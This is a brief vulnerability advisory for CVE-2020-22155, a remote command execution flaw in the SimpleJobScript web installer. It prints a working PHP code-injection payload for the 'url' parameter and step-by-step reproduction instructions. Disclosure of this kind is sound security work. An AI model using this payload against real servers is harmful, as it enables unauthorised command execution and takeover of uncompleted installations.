CVE-2020-22155

February 13, 2020 One minute read

The installer of SimpleJobScript is vulnerable to Remote Command Execution if not completed yet through the parameter url.

mitre: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-22155
public announcement: https://github.com/niteosoft/simplejobscript/issues/8

Description:
The installer of SimpleJobScript is vulnerable to Remote Command Execution if not completed yet through the parameter url

Details:
URL: /installer.php
Parameter: url

Payload:
url=example.com'.system('id').'&host=127.0.0.1&port=3306&username=test&password=test&db_name=sjs&submit=Save

Steps to Reproduce:
1/ Download and extract the SimpleJobScript archive in the server web directory:
https://simplejobscript.com/downloads/category/products/
2/ Run the installer
3/ If the installation process has never been completed before you’ll be prompt a form to submit database informations
4/ In the App Url input, enter the payload below and submit: example.com'.system('id').'
5/ Visit with your browser: /_config/config.envs.php

PoC: cve-2020-22155 SimpleJobScript rce